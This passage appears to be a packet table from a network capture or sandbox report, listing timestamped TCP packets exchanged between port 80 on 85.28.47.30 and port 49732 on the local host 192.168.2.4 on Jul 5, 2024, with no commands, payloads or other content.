                                                                Jul 5, 2024 04:23:11.155359983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155373096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155380964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.155407906 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.155524015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155539989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155550957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155565023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155567884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.155579090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155592918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.155621052 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.155771971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155782938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155792952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155805111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155812979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.155817032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155826092 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.155833006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155844927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155853033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.155858040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.155875921 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.155889034 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.157610893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157620907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157632113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157645941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157656908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157658100 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.157685995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.157697916 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.157735109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157747030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157756090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157767057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157778025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157778978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.157800913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.157818079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.157888889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157898903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157908916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157918930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.157937050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.157953024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.160605907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.160615921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.160626888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.160657883 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.160672903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.160679102 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.160686016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.160702944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.160713911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.160726070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.160727978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.160737991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.160749912 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.160763025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.160789013 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161024094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161036015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161045074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161062956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161087036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161101103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161112070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161122084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161133051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161139965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161165953 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161195993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161207914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161222935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161235094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161247015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161248922 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161261082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161282063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161295891 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161420107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161432981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161442995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161454916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161463976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161468029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161479950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161489964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161492109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161504030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161516905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161520004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161530018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161546946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161560059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161571026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161580086 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161586046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161593914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161597967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161609888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161619902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161619902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161633015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161643028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161643982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161655903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161664963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161669970 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161678076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161679983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161689043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161700010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161706924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161706924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161711931 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161724091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161734104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161742926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161746979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161756992 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161767960 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161783934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161796093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161798954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161807060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161818981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161824942 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161829948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161837101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161843061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161854029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161855936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161875963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161899090 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161922932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161933899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161943913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161955118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161966085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.161969900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.161988974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.162010908 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.162024975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.162040949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.162051916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.162064075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.162075043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.162075996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.162102938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.162115097 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.162127018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.162137985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.162170887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.239022970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.239046097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.239056110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.239064932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.239083052 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.239100933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.239110947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.239121914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.239134073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.239191055 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.239202976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.239237070 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.241889954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.241919041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.241930008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.241956949 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.241992950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.242084026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.242098093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.242109060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.242120028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.242132902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.242160082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.242841005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.242851973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.242862940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.242877960 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.242897034 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.242933989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.242944956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.242960930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.242969990 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.242974043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.242996931 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.243020058 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.243120909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.243132114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.243140936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.243151903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.243161917 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.243163109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.243175030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.243185997 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.243190050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.243197918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.243232012 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.245892048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.245903969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.245914936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.245959044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.245978117 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.246056080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246068954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246087074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246097088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246105909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246112108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.246117115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246134996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.246135950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246150017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246160030 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.246160984 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246175051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246180058 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.246190071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246192932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.246202946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.246221066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.246238947 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251456976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251475096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251494884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251528978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251554012 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251568079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251579046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251588106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251610994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251617908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251632929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251638889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251646042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251655102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251663923 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251677036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251691103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251699924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251703024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251713991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251739979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251758099 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251770973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251801968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251813889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251837969 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251863003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251888037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251899004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251910925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251923084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.251938105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251962900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.251993895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252003908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252013922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252024889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252032042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252037048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252047062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252049923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252060890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252077103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252103090 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252132893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252144098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252152920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252162933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252171040 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252175093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252182007 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252187967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252201080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252208948 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252233028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252258062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252283096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252294064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252302885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252335072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252357006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252403021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252413988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252425909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252438068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252448082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252450943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252473116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252490997 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252535105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252546072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252556086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252569914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252578020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252583027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252593040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252603054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252609968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252614021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252621889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252634048 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252659082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252672911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252690077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252700090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252706051 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252713919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252726078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252726078 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252738953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252741098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252752066 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252760887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252764940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252789974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252803087 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252929926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252942085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252952099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252962112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252964973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252975941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.252985954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.252986908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.253011942 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.253030062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.253031015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.253042936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.253052950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.253063917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.253071070 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.253076077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.253087997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.253098965 CEST804973285.28.47.30192.168.2.4
